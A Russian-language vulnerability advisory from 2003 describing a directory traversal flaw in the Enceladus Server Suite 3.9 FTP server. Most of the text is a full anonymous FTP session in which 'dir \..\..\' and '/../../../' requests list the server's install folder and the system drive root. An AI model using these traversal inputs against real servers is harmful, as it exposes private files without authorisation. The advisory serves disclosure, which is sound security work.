Раскрытие содержания произвольных каталогов в Enceladus Server Suite
| Дата публикации: | 29.01.2003 |
| Всего просмотров: | 1036 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость проверки правильности ввода обнаружена в Enceladus Server Suite – Web/FTP сервере для Windows. Удаленный авторизованный пользователь, в т.ч. и анонимный пользователь, может просматривать содержание каталогов на уязвимой системе. Как сообщается, Enceladus Server Suite не фильтрует "\.." и "/.." последовательности символов в запросах пользователя. В результате удаленный авторизованный пользователь может представить специально сформированный запрос, который раскоет содержание каталогов вне FTP root каталога. Уязвимость обнаружена в Enceladus Server Suite 3.9 Пример: Connected to 192.168.1.199. 220 Mollensoft FTP Server Ready. User (192.168.1.199:(none)): anonymous 331 Password required for anonymous. Password: 230 User anonymous logged in. ftp> ls 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. index.html readme.txt 226 Listing complete. ftp: 24 bytes received in 0,00Seconds 24000,00Kbytes/sec. ftp> cd .. 550 Access denied ftp> cd ... 550 Access denied ftp> cd \..\ 550 Access denied ftp> cd/../ Invalid command. ftp> cd /../ 550 Access denied ftp> ls /../ 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. 226 Listing complete. ftp> ls /../../ 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. 226 Listing complete. ftp> ls \..\..\ 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. 226 Listing complete. ftp> dir \..\..\ 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. drwxr-xr-x 1 User Group 0 Jan 19 10:33 backup-html drwxr-xr-x 1 User Group 0 Jan 19 10:33 cgi-bin drwxr-xr-x 1 User Group 0 Jan 19 10:46 config -rwxr-xr-x 1 User Group 1016037 Mar 21 00:34 ENCELADUSHELP.CHM -rwxr-xr-x 1 User Group 241664 Nov 24 23:57 EnceladusServer3.9.exe drwxr-xr-x 1 User Group 0 Jan 19 10:33 html drwxr-xr-x 1 User Group 0 Jan 19 10:33 logs -rwxr-xr-x 1 User Group 30880 Jan 19 10:45 UNINSTAL.DAT drwxr-xr-x 1 User Group 0 Jan 19 10:33 users 226 Listing complete. ftp: 619 bytes received in 0,00Seconds 619000,00Kbytes/sec. ftp> dir \..\..\..\..\..\..\..\ 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. -rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT -rwxr-xr-x 1 User Group 278 Jan 18 08:49 boot.ini -rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS drwxr-xr-x 1 User Group 0 Jan 19 10:33 enceladus -rwxr-xr-x 1 User Group 5135127 Jan 19 10:32 EnceladusServerSuiteDemoV3.1.EXE drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386 drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler til Windows Update -rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS -rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files -rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM -rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack -rwxr-xr-x 1 User Group 524288000 Jan 19 10:35 pagefile.sys drwxr-xr-x 1 User Group 0 Jan 19 10:19 Program Files drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER drwxr-xr-x 1 User Group 0 Jan 19 10:45 TEMP drwxr-xr-x 1 User Group 0 Jan 19 10:36 WINNT 226 Listing complete. ftp: 1340 bytes received in 0,13Seconds 10,31Kbytes/sec. ftp> dir /../../../ 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. -rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT -rwxr-xr-x 1 User Group 278 Jan 18 08:49 boot.ini -rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS drwxr-xr-x 1 User Group 0 Jan 19 10:33 enceladus -rwxr-xr-x 1 User Group 5135127 Jan 19 10:32 EnceladusServerSuiteDemoV3.1.EXE drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386 drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler til Windows Update -rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS -rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files -rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM -rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack -rwxr-xr-x 1 User Group 524288000 Jan 19 10:35 pagefile.sys drwxr-xr-x 1 User Group 0 Jan 19 10:19 Program Files drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER drwxr-xr-x 1 User Group 0 Jan 19 10:45 TEMP drwxr-xr-x 1 User Group 0 Jan 19 10:36 WINNT 226 Listing complete. ftp: 1340 bytes received in 0,14Seconds 9,57Kbytes/sec. ftp> bye 221 Goodbye. |
| Ссылки: | Directory Traversal vulnerability found in Enceladus Server Suite version 3.9 |